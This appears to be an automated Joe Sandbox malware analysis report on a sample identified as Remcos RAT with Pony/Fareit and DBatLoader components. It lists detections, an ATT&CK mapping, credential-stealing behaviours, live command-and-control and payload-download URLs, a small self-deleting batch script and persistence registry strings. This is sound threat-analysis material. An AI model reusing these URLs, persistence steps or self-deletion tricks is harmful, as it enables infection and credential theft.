                    Source: file.exe, 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpString found in binary or memory: \uninstall.vbsEXEpathUserinitC:\WINDOWS\system32\userinit.exeShellexplorer.exeSoftware\Microsoft\Windows NT\CurrentVersion\Winlogon\\update.vbsCreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)\restart.vbsUserProfileAppDataProgramFiles\SysWOW64\system32WinDirSystemDrive@@ (32 bit) (64 bit)SOFTWARE\Microsoft\Windows NT\CurrentVersionProductNameInjRemcos_Mutex_InjWDSoftware\licence_code.txt-lSetProcessDEPPolicyShell32IsUserAnAdminGetComputerNameExWIsWow64Processkernel32kernel32.dllGlobalMemoryStatusExGetModuleFileNameExWKernel32.dllPsapi.dllGetModuleFileNameExAProgram Files (x86)\Program Files\1SETTINGS
                    Source: file.exe, 0000000B.00000002.2305053551.00000000006D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Remcos_Mutex_InjDOM^
                    Yara detected Pony
                    Source: Yara matchFile source: 5.2.SGS.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: SGS.exe PID: 4720, type: MEMORYSTR
                    Yara detected Remcos RAT
                    Source: Yara matchFile source: 11.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.4505601069.00000000022FF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.4505309464.00000000004F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: file.exe PID: 432, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: file.exe PID: 6000, type: MEMORYSTR
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: cmd.exe11_2_00402AAD

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity Information1
                    Scripting                    		1
                    Valid Accounts                    		2
                    Native API                    		1
                    Scripting                    		1
                    DLL Side-Loading                    		1
                    Deobfuscate/Decode Files or Information                    		3
                    OS Credential Dumping                    		1
                    System Time Discovery                    		Remote Services1
                    Archive Collected Data                    		22
                    Ingress Tool Transfer                    		Exfiltration Over Other Network Medium1
                    System Shutdown/Reboot
                    CredentialsDomainsDefault Accounts1
                    Command and Scripting Interpreter                    		1
                    DLL Side-Loading                    		1
                    Valid Accounts                    		2
                    Obfuscated Files or Information                    		211
                    Input Capture                    		1
                    Account Discovery                    		Remote Desktop Protocol2
                    Data from Local System                    		2
                    Encrypted Channel                    		Exfiltration Over Bluetooth1
                    Defacement
                    Email AddressesDNS ServerDomain Accounts2
                    Service Execution                    		1
                    Valid Accounts                    		11
                    Access Token Manipulation                    		1
                    Install Root Certificate                    		2
                    Credentials in Registry                    		1
                    System Service Discovery                    		SMB/Windows Admin Shares1
                    Screen Capture                    		1
                    Non-Standard Port                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCron1
                    Windows Service                    		1
                    Windows Service                    		1
                    DLL Side-Loading                    		2
                    Credentials In Files                    		4
                    File and Directory Discovery                    		Distributed Component Object Model1
                    Email Collection                    		1
                    Remote Access Software                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchd12
                    Registry Run Keys / Startup Folder                    		222
                    Process Injection                    		1
                    Masquerading                    		LSA Secrets35
                    System Information Discovery                    		SSH211
                    Input Capture                    		2
                    Non-Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts12
                    Registry Run Keys / Startup Folder                    		1
                    Valid Accounts                    		Cached Domain Credentials21
                    Security Software Discovery                    		VNC3
                    Clipboard Data                    		122
                    Application Layer Protocol                    		Data Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
                    Virtualization/Sandbox Evasion                    		DCSync21
                    Virtualization/Sandbox Evasion                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
                    Access Token Manipulation                    		Proc Filesystem2
                    Process Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt222
                    Process Injection                    		/etc/passwd and /etc/shadow1
                    Application Window Discovery                    		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                    System Owner/User Discovery                    		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1574872 Sample: file.exe Startdate: 13/12/2024 Architecture: WINDOWS Score: 100 53 www.mva.by 2->53 55 admino.ml 2->55 57 mva.by 2->57 79 Suricata IDS alerts for network traffic 2->79 81 Found malware configuration 2->81 83 Malicious sample detected (through community Yara rule) 2->83 85 24 other signatures 2->85 10 file.exe 17 2->10         started        15 file.exe 14 2->15         started        signatures3 process4 dnsIp5 61 mva.by 93.125.99.121, 49704, 80 BELPAK-ASBELPAKBY Belarus 10->61 45 C:\Users\user\AppData\Roaming\...\file.exe, PE32 10->45 dropped 47 C:\Users\user\AppData\Local\Temp\SGS.exe, PE32 10->47 dropped 49 C:\Users\user\AppData\Local\...\scan[1].exe, PE32 10->49 dropped 51 C:\Users\user\...\file.exe:Zone.Identifier, ASCII 10->51 dropped 87 Drops PE files to the startup folder 10->87 89 Injects a PE file into a foreign processes 10->89 17 SGS.exe 10->17         started        20 file.exe 1 4 10->20         started        24 SGS.exe 15->24         started        26 file.exe 15->26         started        file6 signatures7 process8 dnsIp9 63 Antivirus detection for dropped file 17->63 65 Multi AV Scanner detection for dropped file 17->65 67 Drops / launches Pony Loader self-deletion script - malware possibly based on Pony Loader leaked source code 17->67 77 2 other signatures 17->77 28 SGS.exe 1 14 17->28         started        59 154.16.63.197, 3360, 49705, 49751 ASDETUKhttpwwwheficedcomGB South Africa 20->59 43 C:\Users\user\AppData\Roaming\...\logs.dat, ASCII 20->43 dropped 69 Opens the same file many times (likely Sandbox evasion) 20->69 31 conhost.exe 20->31         started        71 Injects a PE file into a foreign processes 24->71 33 SGS.exe 14 24->33         started        73 Detected Remcos RAT 26->73 75 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 26->75 file10 signatures11 process12 signatures13 35 cmd.exe 1 28->35         started        91 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 33->91 93 Tries to steal Mail credentials (via file / registry access) 33->93 95 Tries to harvest and steal ftp login credentials 33->95 97 Tries to harvest and steal browser information (history, passwords, etc) 33->97 37 cmd.exe 33->37         started        process14 process15 39 conhost.exe 35->39         started        41 conhost.exe 37->41         started       

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    file.exe74%ReversingLabsWin32.Trojan.Generic
                    file.exe100%AviraHEUR/AGEN.1331271
                    file.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\Temp\SGS.exe100%AviraHEUR/AGEN.1331271
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\scan[1].exe100%AviraHEUR/AGEN.1331271
                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe100%AviraHEUR/AGEN.1331271
                    C:\Users\user\AppData\Local\Temp\SGS.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\scan[1].exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\scan[1].exe79%ReversingLabsWin32.Infostealer.Fareit
                    C:\Users\user\AppData\Local\Temp\SGS.exe79%ReversingLabsWin32.Infostealer.Fareit
                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe74%ReversingLabsWin32.Infostealer.Pony

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://www.mva.by/G0%Avira URL Cloudsafe
                    ftp://http://https://ftp.fireFTPsites.datSeaMonkey0%Avira URL Cloudsafe
                    http://https://ftp://operawand.dat_Software0%Avira URL Cloudsafe
                    http://www.mva.by/=0%Avira URL Cloudsafe
                    http://www.mva.by/tags/scan.exeA%#%#%$#%A1#%#%$#%A10%Avira URL Cloudsafe
                    http://www.mva.by/tags/scan.exeh0%Avira URL Cloudsafe
                    http://www.mva.by/tags/scan.exeA%#%#%$#%A1ca0%Avira URL Cloudsafe
                    http://www.mva.by/tags/scan.exeA%#%#%$#%A10%Avira URL Cloudsafe
                    http://admino.ml/eme/kachistub.exe0%Avira URL Cloudsafe
                    http://admino.ml/eme/gate.phphttp://admino.ml/eme/kachistub.exeYUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI10%Avira URL Cloudsafe
                    http://www.mva.by/tags/scan.exe0%Avira URL Cloudsafe
                    http://www.mva.by/T0%Avira URL Cloudsafe
                    http://www.mva.by/0%Avira URL Cloudsafe
                    http://admino.ml/eme/gate.php0%Avira URL Cloudsafe
                    http://www.mva.by/tags/scan.execrC:0%Avira URL Cloudsafe
                    http://www.mva.by/tags/scan.exeystem320%Avira URL Cloudsafe
                    http://www.mva.by/tags/scan.exeRRC:0%Avira URL Cloudsafe
                    http://www.mva.by/tags/scan.exeLMEM0%Avira URL Cloudsafe
                    http://www.mva.by/tags/scan.exe_A0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    mva.by
                    		93.125.99.121
                    		truefalse
                      		unknown
                      admino.ml
                      		unknown
                      		unknowntrue
                        		unknown
                        www.mva.by
                        		unknown
                        		unknowntrue
                          		unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          http://admino.ml/eme/kachistub.exetrue
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.mva.by/tags/scan.exefalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://admino.ml/eme/gate.phptrue
                          • Avira URL Cloud: safe
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://https://ftp://operawand.dat_SoftwareSGS.exe, 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://duckduckgo.com/chrome_newtabSGS.exe, 00000005.00000003.2179383917.000000000074E000.00000004.00000020.00020000.00000000.sdmp, SGS.exe, 0000000C.00000003.2334120325.0000000000688000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            http://www.mva.by/=file.exe, 00000000.00000003.2126925157.0000000000728000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://duckduckgo.com/ac/?q=SGS.exe, 00000005.00000003.2179383917.000000000074E000.00000004.00000020.00020000.00000000.sdmp, SGS.exe, 0000000C.00000003.2334120325.0000000000688000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://www.google.com/images/branding/product/ico/googleg_lodp.icoSGS.exe, 00000005.00000003.2179659911.000000000074F000.00000004.00000020.00020000.00000000.sdmp, SGS.exe, 00000005.00000003.2179383917.000000000074E000.00000004.00000020.00020000.00000000.sdmp, SGS.exe, 0000000C.00000003.2334120325.0000000000688000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                ftp://http://https://ftp.fireFTPsites.datSeaMonkeySGS.exe, 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.mva.by/Gfile.exe, 00000000.00000003.2126925157.0000000000728000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.mva.by/tags/scan.exeA%#%#%$#%A1#%#%$#%A1file.exe, 00000000.00000003.2085543443.0000000002960000.00000004.00001000.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.mva.by/tags/scan.exeA%#%#%$#%A1file.exe, 00000000.00000003.2085543443.0000000002960000.00000004.00001000.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.ibsensoftware.com/SGS.exe, 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.mva.by/tags/scan.exeA%#%#%$#%A1cafile.exe, 00000000.00000003.2085543443.0000000002960000.00000004.00001000.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=SGS.exe, 00000005.00000003.2179383917.000000000074E000.00000004.00000020.00020000.00000000.sdmp, SGS.exe, 0000000C.00000003.2334120325.0000000000688000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    http://admino.ml/eme/gate.phphttp://admino.ml/eme/kachistub.exeYUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1SGS.exe, 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp, SGS.exe, 0000000C.00000002.2350240628.0000000000414000.00000004.00000400.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=SGS.exe, 00000005.00000003.2179659911.000000000074F000.00000004.00000020.00020000.00000000.sdmp, SGS.exe, 00000005.00000003.2179383917.000000000074E000.00000004.00000020.00020000.00000000.sdmp, SGS.exe, 0000000C.00000003.2334120325.0000000000688000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.mva.by/tags/scan.exehfile.exe, 00000000.00000002.2142430073.00000000006E5000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://www.ecosia.org/newtab/SGS.exe, 00000005.00000003.2179659911.000000000074F000.00000004.00000020.00020000.00000000.sdmp, SGS.exe, 00000005.00000003.2179383917.000000000074E000.00000004.00000020.00020000.00000000.sdmp, SGS.exe, 0000000C.00000003.2334120325.0000000000688000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.mva.by/Tfile.exe, 00000000.00000003.2126925157.0000000000728000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://ac.ecosia.org/autocomplete?q=SGS.exe, 00000005.00000003.2179659911.000000000074F000.00000004.00000020.00020000.00000000.sdmp, SGS.exe, 00000005.00000003.2179383917.000000000074E000.00000004.00000020.00020000.00000000.sdmp, SGS.exe, 0000000C.00000003.2334120325.0000000000688000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchSGS.exe, 00000005.00000003.2179659911.000000000074F000.00000004.00000020.00020000.00000000.sdmp, SGS.exe, 00000005.00000003.2179383917.000000000074E000.00000004.00000020.00020000.00000000.sdmp, SGS.exe, 0000000C.00000003.2334120325.0000000000688000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.mva.by/tags/scan.execrC:file.exe, 00000000.00000003.2126925157.0000000000737000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.mva.by/tags/scan.exeystem32file.exe, 00000000.00000003.2126925157.0000000000728000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.mva.by/tags/scan.exeRRC:file.exe, 00000009.00000002.2306159539.000000000090E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000009.00000003.2304232651.00000000008FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.mva.by/tags/scan.exeLMEMfile.exe, 00000000.00000003.2126925157.0000000000728000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=SGS.exe, 00000005.00000003.2179659911.000000000074F000.00000004.00000020.00020000.00000000.sdmp, SGS.exe, 00000005.00000003.2179383917.000000000074E000.00000004.00000020.00020000.00000000.sdmp, SGS.exe, 0000000C.00000003.2334120325.0000000000688000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.mva.by/tags/scan.exe_Afile.exe, 00000009.00000002.2305977455.000000000086E000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.mva.by/file.exe, 00000000.00000003.2126925157.0000000000728000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown

                                              World Map of Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public IPs

                                              IPDomainCountryFlagASNASN NameMalicious
                                              154.16.63.197
                                              		unknownSouth Africa
                                              		61317ASDETUKhttpwwwheficedcomGBtrue
                                              93.125.99.121
                                              		mva.byBelarus
                                              		6697BELPAK-ASBELPAKBYfalse

                                              General Information

                                              Joe Sandbox version:41.0.0 Charoite
                                              Analysis ID:1574872
                                              Start date and time:2024-12-13 17:56:36 +01:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 9m 35s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Number of analysed new started processes analysed:16
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:file.exe
                                              Detection:MAL
                                              Classification:mal100.rans.troj.adwa.spyw.evad.winEXE@23/8@3/2
                                              EGA Information:
                                              • Successful, ratio: 33.3%
                                              HCA Information:
                                              • Successful, ratio: 100%
                                              • Number of executed functions: 90
                                              • Number of non-executed functions: 232
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe
                                              • Override analysis time to 240000 for current running targets taking high CPU consumption

                                              Warnings

                                              • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                              • Excluded IPs from analysis (whitelisted): 13.107.246.63, 172.202.163.200
                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                              • Execution Graph export aborted for target SGS.exe, PID 5968 because there are no executed function
                                              • Execution Graph export aborted for target SGS.exe, PID 7148 because there are no executed function
                                              • Execution Graph export aborted for target file.exe, PID 1076 because there are no executed function
                                              • Execution Graph export aborted for target file.exe, PID 4084 because there are no executed function
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                              • VT rate limit hit for: file.exe

                                              Simulations

                                              Behavior and APIs

                                              TimeTypeDescription
                                              11:57:27API Interceptor5017953x Sleep call for process: file.exe modified
                                              11:57:35API Interceptor2x Sleep call for process: SGS.exe modified
                                              17:57:37AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe

                                              Joe Sandbox View / Context

                                              IPs

                                              No context

                                              Domains

                                              No context

                                              ASNs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              BELPAK-ASBELPAKBYjade.sh4.elfGet hashmaliciousMiraiBrowse
                                              • 37.212.246.192
                                              la.bot.arm6.elfGet hashmaliciousMiraiBrowse
                                              • 86.57.233.10
                                              Owari.mpsl.elfGet hashmaliciousUnknownBrowse
                                              • 93.84.101.32
                                              jew.arm6.elfGet hashmaliciousUnknownBrowse
                                              • 178.121.230.53
                                              meerkat.arm.elfGet hashmaliciousMiraiBrowse
                                              • 178.120.18.254
                                              main_ppc.elfGet hashmaliciousMiraiBrowse
                                              • 37.213.184.109
                                              teste.arm.elfGet hashmaliciousGafgyt, Mirai, Moobot, OkiruBrowse
                                              • 93.84.125.13
                                              72STaC6BmljfbIQ.exeGet hashmaliciousFormBookBrowse
                                              • 178.172.160.30
                                              sora.mpsl.elfGet hashmaliciousMiraiBrowse
                                              • 93.85.251.230
                                              mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                              • 178.123.247.50
                                              ASDETUKhttpwwwheficedcomGBelitebotnet.arm5.elfGet hashmaliciousMirai, OkiruBrowse
                                              • 134.202.154.125
                                              hax.mpsl.elfGet hashmaliciousMiraiBrowse
                                              • 191.108.164.183
                                              6fW0GedR6j.xlsGet hashmaliciousUnknownBrowse
                                              • 181.214.58.112
                                              meerkat.arm.elfGet hashmaliciousMiraiBrowse
                                              • 191.107.60.113
                                              home.ppc.elfGet hashmaliciousMiraiBrowse
                                              • 89.207.176.202
                                              .akcqrfutuo.elfGet hashmaliciousUnknownBrowse
                                              • 193.176.187.115
                                              MjU4dYOfgf.exeGet hashmaliciousAgentTeslaBrowse
                                              • 191.101.50.240
                                              Demon.i586.elfGet hashmaliciousMirai, GafgytBrowse
                                              • 85.209.17.110
                                              Demon.sh4.elfGet hashmaliciousMirai, GafgytBrowse
                                              • 85.209.17.110
                                              Demon.mips.elfGet hashmaliciousMirai, GafgytBrowse
                                              • 85.209.17.110

                                              JA3 Fingerprints

                                              No context

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\scan[1].exe

                                              Download File
                                              Process:C:\Users\user\Desktop\file.exe
                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):853504
                                              Entropy (8bit):6.648979455916544
                                              Encrypted:false
                                              SSDEEP:12288:jWBoBYd39letTbwm3Undsb+gfrEJ6txTtGbth0VCr/VRaDtdzDXT+0N2:jeR9ItXwdnWbLrEJO8mOERXTH2
                                              MD5:31B2F8C329A601B145E7E71A6D120A7B
                                              SHA1:58487332C00CB299D67F14C288CBDF9AA9099E44
                                              SHA-256:F06D03375B253842A56748E5E49206147AB986E73B109392A36BE672616C6B5D
                                              SHA-512:92021E862955CCEC4FF72770CDD1A89D165F26C500A907DD078C4D665423B56736FA0A81CF5D50AB8DA91807A18A762D2C307F3AA503187BABB598674DE3AC1C
                                              Malicious:true
                                              Yara Hits:
                                              • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\scan[1].exe, Author: Joe Security
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              • Antivirus: ReversingLabs, Detection: 79%
                                              Reputation:low
                                              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................V...........d.......p....@..........................p...................@...............................$...p...........................s..................................................................................CODE.....`.......V.................. ..`DATA..... ...p.......Z..............@...BSS..................n...................idata...0.......&...n..............@....tls.....................................rdata..............................@..P.reloc...........t..................@..P.rsrc........p......................@..P....................................@..P........................................................................................................................................

                                              C:\Users\user\AppData\Local\Temp\5234062.bat

                                              Download File
                                              Process:C:\Users\user\AppData\Local\Temp\SGS.exe
                                              File Type:ASCII text, with CRLF, CR line terminators
                                              Category:dropped
                                              Size (bytes):94
                                              Entropy (8bit):3.233204299824007
                                              Encrypted:false
                                              SSDEEP:3:k4Zoa5/kFWJFFN6dAFZkMFlGl/AVFn:k/0/kFY/NDFZotwFn
                                              MD5:3880EEB1C736D853EB13B44898B718AB
                                              SHA1:4EEC9D50360CD815211E3C4E6BDD08271B6EC8E6
                                              SHA-256:936D9411D5226B7C5A150ECAF422987590A8870C8E095E1CAA072273041A86E7
                                              SHA-512:3EAA3DDDD7A11942E75ACD44208FBE3D3FF8F4006951CD970FB9AB748C160739409803450D28037E577443504707FC310C634E9DC54D0C25E8CFE6094F017C6B
                                              Malicious:false
                                              Reputation:moderate, very likely benign file
                                              Preview:......... :ktk ...... del . %1 ...if .. exist . %1 . goto .. ktk.. del . %0

                                              C:\Users\user\AppData\Local\Temp\5249171.bat

                                              Download File
                                              Process:C:\Users\user\AppData\Local\Temp\SGS.exe
                                              File Type:ASCII text, with CRLF, CR line terminators
                                              Category:dropped
                                              Size (bytes):94
                                              Entropy (8bit):3.233204299824007
                                              Encrypted:false
                                              SSDEEP:3:k4Zoa5/kFWJFFN6dAFZkMFlGl/AVFn:k/0/kFY/NDFZotwFn
                                              MD5:3880EEB1C736D853EB13B44898B718AB
                                              SHA1:4EEC9D50360CD815211E3C4E6BDD08271B6EC8E6
                                              SHA-256:936D9411D5226B7C5A150ECAF422987590A8870C8E095E1CAA072273041A86E7
                                              SHA-512:3EAA3DDDD7A11942E75ACD44208FBE3D3FF8F4006951CD970FB9AB748C160739409803450D28037E577443504707FC310C634E9DC54D0C25E8CFE6094F017C6B
                                              Malicious:false
                                              Preview:......... :ktk ...... del . %1 ...if .. exist . %1 . goto .. ktk.. del . %0

                                              C:\Users\user\AppData\Local\Temp\SGS.exe

                                              Download File
                                              Process:C:\Users\user\Desktop\file.exe
                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):853504
                                              Entropy (8bit):6.648979455916544
                                              Encrypted:false
                                              SSDEEP:12288:jWBoBYd39letTbwm3Undsb+gfrEJ6txTtGbth0VCr/VRaDtdzDXT+0N2:jeR9ItXwdnWbLrEJO8mOERXTH2
                                              MD5:31B2F8C329A601B145E7E71A6D120A7B
                                              SHA1:58487332C00CB299D67F14C288CBDF9AA9099E44
                                              SHA-256:F06D03375B253842A56748E5E49206147AB986E73B109392A36BE672616C6B5D
                                              SHA-512:92021E862955CCEC4FF72770CDD1A89D165F26C500A907DD078C4D665423B56736FA0A81CF5D50AB8DA91807A18A762D2C307F3AA503187BABB598674DE3AC1C
                                              Malicious:true
                                              Yara Hits:
                                              • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: C:\Users\user\AppData\Local\Temp\SGS.exe, Author: Joe Security
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              • Antivirus: ReversingLabs, Detection: 79%
                                              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................V...........d.......p....@..........................p...................@...............................$...p...........................s..................................................................................CODE.....`.......V.................. ..`DATA..... ...p.......Z..............@...BSS..................n...................idata...0.......&...n..............@....tls.....................................rdata..............................@..P.reloc...........t..................@..P.rsrc........p......................@..P....................................@..P........................................................................................................................................

                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe

                                              Download File
                                              Process:C:\Users\user\Desktop\file.exe
                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):917504
                                              Entropy (8bit):6.600373214988344
                                              Encrypted:false
                                              SSDEEP:12288:ZWBoBYd39letTbwm3Undsb+gfrEJLzDQ2bALSKLmDt8N90il5HyV/e4:ZeR9ItXwdnWbLrEJJrta5Hah
                                              MD5:21D13F2F3C4DB8F083B672D81831FA5E
                                              SHA1:B93F931A10A8A4B6F155B6B2AD9C5F9FBB3D71D0
                                              SHA-256:17BB66D25EC39D1818CC01E067EA7139EEF15DCB24BCE24840666EEDE661A3C3
